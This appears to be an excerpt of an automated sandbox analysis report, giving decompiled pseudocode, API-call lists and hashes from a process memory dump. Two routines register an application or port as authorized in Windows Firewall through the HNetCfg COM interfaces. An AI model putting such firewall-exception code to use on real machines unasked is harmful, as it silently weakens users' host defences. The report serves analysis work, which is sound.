                                                                                                                                                                      • Part of subcall function 00B180F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00B11112,00000000), ref: 00B1815C
                                                                                                                                                                      • Part of subcall function 00B180F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00B11112,00000000), ref: 00B181EB
                                                                                                                                                                      • Part of subcall function 00B180F0: GetLastError.KERNEL32(?,000000FE,?,00B11112,00000000), ref: 00B18206
                                                                                                                                                                      • Part of subcall function 00B180F0: SysAllocString.OLEAUT32(00000000), ref: 00B18221
                                                                                                                                                                    • SysAllocString.OLEAUT32(LAN), ref: 00B111D6
                                                                                                                                                                    • _com_util::ConvertStringToBSTR.COMSUPP ref: 00B111E2
                                                                                                                                                                      • Part of subcall function 00B180F0: _malloc.LIBCMT ref: 00B181A1
                                                                                                                                                                      • Part of subcall function 00B11071: __wcstoui64.LIBCMT ref: 00B110DB
                                                                                                                                                                    • _com_util::ConvertStringToBSTR.COMSUPP ref: 00B1120E
                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000002,00000001,?), ref: 00B11219
                                                                                                                                                                    • CoCreateInstance.OLE32(00B1DB2C,00000000,00000001,00B1DB3C,?), ref: 00B11295
                                                                                                                                                                    • CoUninitialize.OLE32(?), ref: 00B11365
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                    • Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$Convert_com_util::$AllocByteCharErrorLastMultiWide$CreateInitializeInstanceUninitialize__wcstoui64_malloclstrlen
                                                                                                                                                                    • String ID: LAN$ThunderNetWork
                                                                                                                                                                    • API String ID: 1199507461-1899760959
                                                                                                                                                                    • Opcode ID: 4370160322aefcf033959a3cd18533cc0f664b64615e718a9639c0334bdf0c73
                                                                                                                                                                    • Instruction ID: c2fb4933427d86bac9c95999c641ab8b53d954864c1cb798b08ca4e98d48b3de
                                                                                                                                                                    • Opcode Fuzzy Hash: 4370160322aefcf033959a3cd18533cc0f664b64615e718a9639c0334bdf0c73
                                                                                                                                                                    • Instruction Fuzzy Hash: F961FC75A00209AFCB00DFE4C888ADE7BF9FF49714F504498F915EB251DB759A82CB64
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                                    			E00B11567(char* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                    				char _v28;
                                                                                                                                                                    				void* _v32;
                                                                                                                                                                    				void* _v36;
                                                                                                                                                                    				void* _v40;
                                                                                                                                                                    				void* _v44;
                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				signed int _t34;
                                                                                                                                                                    				void* _t38;
                                                                                                                                                                    				char* _t39;
                                                                                                                                                                    				intOrPtr* _t40;
                                                                                                                                                                    				intOrPtr* _t41;
                                                                                                                                                                    				intOrPtr* _t42;
                                                                                                                                                                    				intOrPtr* _t43;
                                                                                                                                                                    				char* _t51;
                                                                                                                                                                    				intOrPtr* _t52;
                                                                                                                                                                    				char* _t53;
                                                                                                                                                                    				intOrPtr* _t54;
                                                                                                                                                                    				char* _t55;
                                                                                                                                                                    				char* _t58;
                                                                                                                                                                    				intOrPtr* _t59;
                                                                                                                                                                    				char* _t60;
                                                                                                                                                                    				intOrPtr* _t75;
                                                                                                                                                                    				signed int _t78;
                                                                                                                                                                    
                                                                                                                                                                    				_t74 = __edx;
                                                                                                                                                                    				_t34 =  *0xb1f008; // 0x101c184a
                                                                                                                                                                    				_v12 = _t34 ^ _t78;
                                                                                                                                                                    				_v48 = _a4;
                                                                                                                                                                    				__imp__CoInitialize(0);
                                                                                                                                                                    				_v44 = 0;
                                                                                                                                                                    				_v36 = 0;
                                                                                                                                                                    				_v40 = 0;
                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                    				_t38 = E00B180F0(__edx, "HNetCfg.FwMgr");
                                                                                                                                                                    				_t75 = __imp__CLSIDFromProgID;
                                                                                                                                                                    				_t39 =  *_t75(_t38,  &_v28);
                                                                                                                                                                    				_t76 = _t39;
                                                                                                                                                                    				if(_t39 == 0) {
                                                                                                                                                                    					_t51 =  &_v28;
                                                                                                                                                                    					__imp__CoCreateInstance(_t51, 0, 5, 0xb1c17c,  &_v44);
                                                                                                                                                                    					_t76 = _t51;
                                                                                                                                                                    					if(_t51 >= 0) {
                                                                                                                                                                    						_t52 = _v44;
                                                                                                                                                                    						_t74 =  &_v36;
                                                                                                                                                                    						_t53 =  *((intOrPtr*)( *_t52 + 0x1c))(_t52,  &_v36);
                                                                                                                                                                    						_t76 = _t53;
                                                                                                                                                                    						if(_t53 >= 0) {
                                                                                                                                                                    							_t54 = _v36;
                                                                                                                                                                    							_t74 =  &_v40;
                                                                                                                                                                    							_t55 =  *((intOrPtr*)( *_t54 + 0x1c))(_t54,  &_v40);
                                                                                                                                                                    							_t76 = _t55;
                                                                                                                                                                    							if(_t55 >= 0) {
                                                                                                                                                                    								_t58 =  *_t75(E00B180F0( &_v40, "HNetCfg.FwAuthorizedApplication"),  &_v28);
                                                                                                                                                                    								_t76 = _t58;
                                                                                                                                                                    								if(_t58 >= 0) {
                                                                                                                                                                    									_t59 = _v40;
                                                                                                                                                                    									_t74 =  &_v32;
                                                                                                                                                                    									_t60 =  *((intOrPtr*)( *_t59 + 0x50))(_t59,  &_v32);
                                                                                                                                                                    									_t76 = _t60;
                                                                                                                                                                    									if(_t60 >= 0) {
                                                                                                                                                                    										_t76 =  *((intOrPtr*)( *_v32 + 0x24))(_v32, E00B180F0( &_v32, _v48));
                                                                                                                                                                    									}
                                                                                                                                                                    								}
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				_t40 = _v32;
                                                                                                                                                                    				if(_t40 != 0) {
                                                                                                                                                                    					 *((intOrPtr*)( *_t40 + 8))(_t40);
                                                                                                                                                                    				}
                                                                                                                                                                    				_t41 = _v40;
                                                                                                                                                                    				if(_t41 != 0) {
                                                                                                                                                                    					 *((intOrPtr*)( *_t41 + 8))(_t41);
                                                                                                                                                                    				}
                                                                                                                                                                    				_t42 = _v36;
                                                                                                                                                                    				if(_t42 != 0) {
                                                                                                                                                                    					 *((intOrPtr*)( *_t42 + 8))(_t42);
                                                                                                                                                                    				}
                                                                                                                                                                    				_t43 = _v44;
                                                                                                                                                                    				if(_t43 != 0) {
                                                                                                                                                                    					 *((intOrPtr*)( *_t43 + 8))(_t43);
                                                                                                                                                                    				}
                                                                                                                                                                    				__imp__CoUninitialize();
                                                                                                                                                                    				return E00B11C57(_t76, 0, _v12 ^ _t78, _t74, _t75, _t76);
                                                                                                                                                                    			}






























                                                                                                                                                                    0x00b1166c
                                                                                                                                                                    0x00b11682

                                                                                                                                                                    APIs
                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00B11583
                                                                                                                                                                    • _com_util::ConvertStringToBSTR.COMSUPP ref: 00B1159E
                                                                                                                                                                    • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwMgr,?), ref: 00B115AA
                                                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,00B1C17C,?), ref: 00B115C6
                                                                                                                                                                    • _com_util::ConvertStringToBSTR.COMSUPP ref: 00B11601
                                                                                                                                                                      • Part of subcall function 00B180F0: lstrlenA.KERNEL32(?,101C184A,?,80004005,?,000000FE,?,00B11112,00000000), ref: 00B18137
                                                                                                                                                                      • Part of subcall function 00B180F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00B11112,00000000), ref: 00B1814D
                                                                                                                                                                      • Part of subcall function 00B180F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00B11112,00000000), ref: 00B1815C
                                                                                                                                                                      • Part of subcall function 00B180F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00B11112,00000000), ref: 00B181EB
                                                                                                                                                                      • Part of subcall function 00B180F0: GetLastError.KERNEL32(?,000000FE,?,00B11112,00000000), ref: 00B18206
                                                                                                                                                                      • Part of subcall function 00B180F0: SysAllocString.OLEAUT32(00000000), ref: 00B18221
                                                                                                                                                                    • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwAuthorizedApplication,?), ref: 00B11607
                                                                                                                                                                    • _com_util::ConvertStringToBSTR.COMSUPP ref: 00B1162A
                                                                                                                                                                      • Part of subcall function 00B180F0: _malloc.LIBCMT ref: 00B181A1
                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00B1166C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                    • Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$Convert_com_util::$ByteCharErrorFromLastMultiProgWide$AllocCreateInitializeInstanceUninitialize_malloclstrlen
                                                                                                                                                                    • String ID: HNetCfg.FwAuthorizedApplication$HNetCfg.FwMgr
                                                                                                                                                                    • API String ID: 4188526640-1951265404
                                                                                                                                                                    • Opcode ID: 0112a7aebc83a517460b97378800b72926f5a5bfa43f355321a74633caa8173b
                                                                                                                                                                    • Instruction ID: 29d69cc66cc2351cd21a5b1a8ec276b6e6e2860b5c4bef8f41acdc69e3a2a429
                                                                                                                                                                    • Opcode Fuzzy Hash: 0112a7aebc83a517460b97378800b72926f5a5bfa43f355321a74633caa8173b
                                                                                                                                                                    • Instruction Fuzzy Hash: CA41F471D402199FCB10EFA8C8888EDB7F9FF4D310B9449A9E605F7251DA359D85CB60
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 54%
                                                                                                                                                                    			E00B11683(char* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                    				char _v28;
                                                                                                                                                                    				void* _v32;
                                                                                                                                                                    				void* _v36;
                                                                                                                                                                    				void* _v40;
                                                                                                                                                                    				void* _v44;
                                                                                                                                                                    				char _v48;
                                                                                                                                                                    				char _v52;
                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				signed int _t39;
                                                                                                                                                                    				void* _t43;
                                                                                                                                                                    				char* _t44;
                                                                                                                                                                    				intOrPtr* _t45;
                                                                                                                                                                    				intOrPtr* _t46;
                                                                                                                                                                    				intOrPtr* _t47;
                                                                                                                                                                    				intOrPtr* _t48;
                                                                                                                                                                    				char* _t56;
                                                                                                                                                                    				intOrPtr* _t57;
                                                                                                                                                                    				char* _t58;
                                                                                                                                                                    				intOrPtr* _t59;
                                                                                                                                                                    				char* _t60;
                                                                                                                                                                    				char* _t63;
                                                                                                                                                                    				intOrPtr* _t64;
                                                                                                                                                                    				char* _t65;
                                                                                                                                                                    				intOrPtr* _t68;
                                                                                                                                                                    				char _t83;
                                                                                                                                                                    				signed int _t86;
                                                                                                                                                                    
                                                                                                                                                                    				_t82 = __edx;
                                                                                                                                                                    				_t39 =  *0xb1f008; // 0x101c184a
                                                                                                                                                                    				_v12 = _t39 ^ _t86;
                                                                                                                                                                    				_t83 = 0;
                                                                                                                                                                    				_v56 = _a4;
                                                                                                                                                                    				__imp__CoInitialize(0);
                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                    				_v44 = 0;
                                                                                                                                                                    				_v40 = 0;
                                                                                                                                                                    				_v36 = 0;
                                                                                                                                                                    				_t43 = E00B180F0(__edx, "HNetCfg.FwMgr");
                                                                                                                                                                    				_t85 = __imp__CLSIDFromProgID;
                                                                                                                                                                    				_t44 =  *_t85(_t43,  &_v28);
                                                                                                                                                                    				_t70 = _t44;
                                                                                                                                                                    				if(_t44 == 0) {
                                                                                                                                                                    					_t56 =  &_v28;
                                                                                                                                                                    					__imp__CoCreateInstance(_t56, 0, 5, 0xb1c17c,  &_v32);
                                                                                                                                                                    					_t70 = _t56;
                                                                                                                                                                    					if(_t56 >= 0) {
                                                                                                                                                                    						_t57 = _v32;
                                                                                                                                                                    						_t82 =  &_v44;
                                                                                                                                                                    						_t58 =  *((intOrPtr*)( *_t57 + 0x1c))(_t57,  &_v44);
                                                                                                                                                                    						_t70 = _t58;
                                                                                                                                                                    						if(_t58 >= 0) {
                                                                                                                                                                    							_t59 = _v44;
                                                                                                                                                                    							_t82 =  &_v40;
                                                                                                                                                                    							_t60 =  *((intOrPtr*)( *_t59 + 0x1c))(_t59,  &_v40);
                                                                                                                                                                    							_t70 = _t60;
                                                                                                                                                                    							if(_t60 >= 0) {
                                                                                                                                                                    								_t63 =  *_t85(E00B180F0( &_v40, "HNetCfg.FwAuthorizedApplication"),  &_v28);
                                                                                                                                                                    								_t70 = _t63;
                                                                                                                                                                    								if(_t63 >= 0) {
                                                                                                                                                                    									_t64 = _v40;
                                                                                                                                                                    									_t82 =  &_v36;
                                                                                                                                                                    									_t65 =  *((intOrPtr*)( *_t64 + 0x48))(_t64,  &_v36);
                                                                                                                                                                    									_t70 = _t65;
                                                                                                                                                                    									if(_t65 >= 0) {
                                                                                                                                                                    										_v52 = 0;
                                                                                                                                                                    										_t85 =  &_v48;
                                                                                                                                                                    										_v48 = 0x100;
                                                                                                                                                                    										if(E00B11071(_v56,  &_v48,  &_v52) != 0) {
                                                                                                                                                                    											_t68 = _v36;
                                                                                                                                                                    											_t70 =  *((intOrPtr*)( *_t68 + 0x24))(_t68, _v52, _v48);
                                                                                                                                                                    										}
                                                                                                                                                                    										_t83 = 0;
                                                                                                                                                                    									}
                                                                                                                                                                    								}
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				_t45 = _v36;
                                                                                                                                                                    				if(_t45 != _t83) {
                                                                                                                                                                    					 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                                                                                                                                    				}
                                                                                                                                                                    				_t46 = _v40;
                                                                                                                                                                    				if(_t46 != _t83) {
                                                                                                                                                                    					 *((intOrPtr*)( *_t46 + 8))(_t46);
                                                                                                                                                                    				}
                                                                                                                                                                    				_t47 = _v44;
                                                                                                                                                                    				if(_t47 != _t83) {
                                                                                                                                                                    					 *((intOrPtr*)( *_t47 + 8))(_t47);
                                                                                                                                                                    				}
                                                                                                                                                                    				_t48 = _v32;
                                                                                                                                                                    				if(_t48 != _t83) {
                                                                                                                                                                    					 *((intOrPtr*)( *_t48 + 8))(_t48);
                                                                                                                                                                    				}
                                                                                                                                                                    				__imp__CoUninitialize();
                                                                                                                                                                    				return E00B11C57(_t70, _t70, _v12 ^ _t86, _t82, _t83, _t85);
                                                                                                                                                                    			}

































                                                                                                                                                                    0x00b1170f
                                                                                                                                                                    0x00b11712
                                                                                                                                                                    0x00b11716
                                                                                                                                                                    0x00b11727
                                                                                                                                                                    0x00b11729
                                                                                                                                                                    0x00b1172d
                                                                                                                                                                    0x00b1172f
                                                                                                                                                                    0x00b11734
                                                                                                                                                                    0x00b11739
                                                                                                                                                                    0x00b1173c
                                                                                                                                                                    0x00b11740
                                                                                                                                                                    0x00b11745
                                                                                                                                                                    0x00b1174c
                                                                                                                                                                    0x00b1174f
                                                                                                                                                                    0x00b1175e
                                                                                                                                                                    0x00b11763
                                                                                                                                                                    0x00b1176f
                                                                                                                                                                    0x00b1176f
                                                                                                                                                                    0x00b11771
                                                                                                                                                                    0x00b11771
                                                                                                                                                                    0x00b11740
                                                                                                                                                                    0x00b1172d
                                                                                                                                                                    0x00b11716
                                                                                                                                                                    0x00b11703
                                                                                                                                                                    0x00b116ec
                                                                                                                                                                    0x00b11773
                                                                                                                                                                    0x00b11778
                                                                                                                                                                    0x00b1177d
                                                                                                                                                                    0x00b1177d
                                                                                                                                                                    0x00b11780
                                                                                                                                                                    0x00b11785
                                                                                                                                                                    0x00b1178a
                                                                                                                                                                    0x00b1178a
                                                                                                                                                                    0x00b1178d
                                                                                                                                                                    0x00b11792
                                                                                                                                                                    0x00b11797
                                                                                                                                                                    0x00b11797
                                                                                                                                                                    0x00b1179a
                                                                                                                                                                    0x00b1179f
                                                                                                                                                                    0x00b117a4
                                                                                                                                                                    0x00b117a4
                                                                                                                                                                    0x00b117a7
                                                                                                                                                                    0x00b117bd

                                                                                                                                                                    APIs
                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00B1169F
                                                                                                                                                                    • _com_util::ConvertStringToBSTR.COMSUPP ref: 00B116BA
                                                                                                                                                                    • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwMgr,?), ref: 00B116C6
                                                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,00B1C17C,?), ref: 00B116E2
                                                                                                                                                                    • _com_util::ConvertStringToBSTR.COMSUPP ref: 00B11721
                                                                                                                                                                      • Part of subcall function 00B180F0: lstrlenA.KERNEL32(?,101C184A,?,80004005,?,000000FE,?,00B11112,00000000), ref: 00B18137
                                                                                                                                                                      • Part of subcall function 00B180F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00B11112,00000000), ref: 00B1814D
                                                                                                                                                                      • Part of subcall function 00B180F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00B11112,00000000), ref: 00B1815C
                                                                                                                                                                      • Part of subcall function 00B180F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00B11112,00000000), ref: 00B181EB
                                                                                                                                                                      • Part of subcall function 00B180F0: GetLastError.KERNEL32(?,000000FE,?,00B11112,00000000), ref: 00B18206
                                                                                                                                                                      • Part of subcall function 00B180F0: SysAllocString.OLEAUT32(00000000), ref: 00B18221
                                                                                                                                                                    • CLSIDFromProgID.OLE32(00000000,HNetCfg.FwAuthorizedApplication,?), ref: 00B11727
                                                                                                                                                                      • Part of subcall function 00B11071: __wcstoui64.LIBCMT ref: 00B110DB
                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00B117A7
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                    • Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$ByteCharConvertErrorFromLastMultiProgWide_com_util::$AllocCreateInitializeInstanceUninitialize__wcstoui64lstrlen
                                                                                                                                                                    • String ID: HNetCfg.FwAuthorizedApplication$HNetCfg.FwMgr
                                                                                                                                                                    • API String ID: 1827900861-1951265404
                                                                                                                                                                    • Opcode ID: efbc8f0cc044cc3df26d0c55e9e3c12a5203f13a7318387cf548b63c1f59614c
                                                                                                                                                                    • Instruction ID: 716c83a085c1eeec31cd9cead8cba1fda2d0c3fddfe1773a499882be2933f0ab
                                                                                                                                                                    • Opcode Fuzzy Hash: efbc8f0cc044cc3df26d0c55e9e3c12a5203f13a7318387cf548b63c1f59614c
                                                                                                                                                                    • Instruction Fuzzy Hash: AA41D0B5A00218AFCB00DFE8C8898EEBBF9EF8D710B644895E501E7351DB759C81CB60
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                                                    			E00B128F4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                    				signed int _t15;
                                                                                                                                                                    				LONG* _t21;
                                                                                                                                                                    				long _t23;
                                                                                                                                                                    				void* _t29;
                                                                                                                                                                    				void* _t31;
                                                                                                                                                                    				LONG* _t33;
                                                                                                                                                                    				void* _t34;
                                                                                                                                                                    				void* _t35;
                                                                                                                                                                    
                                                                                                                                                                    				_t35 = __eflags;
                                                                                                                                                                    				_t29 = __edx;
                                                                                                                                                                    				_t25 = __ebx;
                                                                                                                                                                    				_push(0xc);
                                                                                                                                                                    				_push(0xb1dcb8);
                                                                                                                                                                    				E00B13F70(__ebx, __edi, __esi);
                                                                                                                                                                    				_t31 = E00B1339D(__ebx, __edi, _t35);
                                                                                                                                                                    				_t15 =  *0xb1f534; // 0xfffffffe
                                                                                                                                                                    				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                                                                                                                    					E00B13C3D(_t25, 0xd);
                                                                                                                                                                    					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                                                                                                                    					_t33 =  *(_t31 + 0x68);
                                                                                                                                                                    					 *(_t34 - 0x1c) = _t33;
                                                                                                                                                                    					__eflags = _t33 -  *0xb1f438; // 0x2201660
                                                                                                                                                                    					if(__eflags != 0) {
                                                                                                                                                                    						__eflags = _t33;
                                                                                                                                                                    						if(_t33 != 0) {
                                                                                                                                                                    							_t23 = InterlockedDecrement(_t33);
                                                                                                                                                                    							__eflags = _t23;
                                                                                                                                                                    							if(_t23 == 0) {
                                                                                                                                                                    								__eflags = _t33 - 0xb1f010;
                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                    									_push(_t33);
                                                                                                                                                                    									E00B154A0(_t25, _t29, _t31, _t33, __eflags);
                                                                                                                                                                    								}
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    						_t21 =  *0xb1f438; // 0x2201660
                                                                                                                                                                    						 *(_t31 + 0x68) = _t21;
                                                                                                                                                                    						_t33 =  *0xb1f438; // 0x2201660
                                                                                                                                                                    						 *(_t34 - 0x1c) = _t33;
                                                                                                                                                                    						InterlockedIncrement(_t33);
                                                                                                                                                                    					}
                                                                                                                                                                    					 *(_t34 - 4) = 0xfffffffe;
                                                                                                                                                                    					E00B1298F();
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_t33 =  *(_t31 + 0x68);
                                                                                                                                                                    				}
                                                                                                                                                                    				if(_t33 == 0) {
                                                                                                                                                                    					E00B12033(_t29, _t31, 0x20);
                                                                                                                                                                    				}
                                                                                                                                                                    				return E00B13FB5(_t33);
                                                                                                                                                                    			}











                                                                                                                                                                    0x00b1291c
                                                                                                                                                                    0x00b12920
                                                                                                                                                                    0x00b12925
                                                                                                                                                                    0x00b1292d

                                                                                                                                                                    APIs
                                                                                                                                                                    • __getptd.LIBCMT ref: 00B12900
                                                                                                                                                                      • Part of subcall function 00B1339D: __getptd_noexit.LIBCMT ref: 00B133A0
                                                                                                                                                                      • Part of subcall function 00B1339D: __amsg_exit.LIBCMT ref: 00B133AD
                                                                                                                                                                    • __amsg_exit.LIBCMT ref: 00B12920
                                                                                                                                                                    • __lock.LIBCMT ref: 00B12930
                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00B1294D
                                                                                                                                                                    • InterlockedIncrement.KERNEL32(02201660), ref: 00B12978
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                    • Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4271482742-0
                                                                                                                                                                    • Opcode ID: a1e4418a6413751fe3c642c549d7a948427c2b63f0da28214a475c296a3b0943
                                                                                                                                                                    • Instruction ID: 670cccf0d5df41d64aae83a9ba2d5aa357154b10e0ad5a692607fb388fdd5bd8
                                                                                                                                                                    • Opcode Fuzzy Hash: a1e4418a6413751fe3c642c549d7a948427c2b63f0da28214a475c296a3b0943
                                                                                                                                                                    • Instruction Fuzzy Hash: 92016132D01622DBD721AF5894497DEB7E0FF04BA0FC441A5E45477294CB386AD1CBD5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 41%
                                                                                                                                                                    			E00B154A0(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                    				intOrPtr* _t10;
                                                                                                                                                                    				intOrPtr _t13;
                                                                                                                                                                    				intOrPtr _t24;
                                                                                                                                                                    				void* _t26;
                                                                                                                                                                    
                                                                                                                                                                    				_push(0xc);
                                                                                                                                                                    				_push(0xb1de48);
                                                                                                                                                                    				_t8 = E00B13F70(__ebx, __edi, __esi);
                                                                                                                                                                    				_t24 =  *((intOrPtr*)(_t26 + 8));
                                                                                                                                                                    				if(_t24 == 0) {
                                                                                                                                                                    					L9:
                                                                                                                                                                    					return E00B13FB5(_t8);
                                                                                                                                                                    				}
                                                                                                                                                                    				if( *0xb20a98 != 3) {
                                                                                                                                                                    					_push(_t24);
                                                                                                                                                                    					L7:
                                                                                                                                                                    					_t8 = HeapFree( *0xb2093c, 0, ??);
                                                                                                                                                                    					_t32 = _t8;
                                                                                                                                                                    					if(_t8 == 0) {
                                                                                                                                                                    						_t10 = E00B138CA(_t32);
                                                                                                                                                                    						 *_t10 = E00B13888(GetLastError());
                                                                                                                                                                    					}
                                                                                                                                                                    					goto L9;
                                                                                                                                                                    				}
                                                                                                                                                                    				E00B13C3D(__ebx, 4);
                                                                                                                                                                    				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
                                                                                                                                                                    				_t13 = E00B16520(_t24);
                                                                                                                                                                    				 *((intOrPtr*)(_t26 - 0x1c)) = _t13;
                                                                                                                                                                    				if(_t13 != 0) {
                                                                                                                                                                    					_push(_t24);
                                                                                                                                                                    					_push(_t13);
                                                                                                                                                                    					E00B16550();
                                                                                                                                                                    				}
                                                                                                                                                                    				 *(_t26 - 4) = 0xfffffffe;
                                                                                                                                                                    				_t8 = E00B154F6();
                                                                                                                                                                    				if( *((intOrPtr*)(_t26 - 0x1c)) != 0) {
                                                                                                                                                                    					goto L9;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_push( *((intOrPtr*)(_t26 + 8)));
                                                                                                                                                                    					goto L7;
                                                                                                                                                                    				}
                                                                                                                                                                    			}








                                                                                                                                                                    APIs
                                                                                                                                                                    • __lock.LIBCMT ref: 00B154BE
                                                                                                                                                                      • Part of subcall function 00B13C3D: __mtinitlocknum.LIBCMT ref: 00B13C53
                                                                                                                                                                      • Part of subcall function 00B13C3D: __amsg_exit.LIBCMT ref: 00B13C5F
                                                                                                                                                                      • Part of subcall function 00B13C3D: EnterCriticalSection.KERNEL32(?,?,?,00B1754D,00000004,00B1DEC8,0000000C,00B15589,00000000,?,00000000,00000000,00000000,?,00B1334F,00000001), ref: 00B13C67
                                                                                                                                                                    • ___sbh_find_block.LIBCMT ref: 00B154C9
                                                                                                                                                                    • ___sbh_free_block.LIBCMT ref: 00B154D8
                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,00B1DE48,0000000C,00B13C1E,00000000,00B1DD68,0000000C,00B13C58,00000000,?,?,00B1754D,00000004,00B1DEC8,0000000C), ref: 00B15508
                                                                                                                                                                    • GetLastError.KERNEL32(?,00B1754D,00000004,00B1DEC8,0000000C,00B15589,00000000,?,00000000,00000000,00000000,?,00B1334F,00000001,00000214), ref: 00B15519
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                    • Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
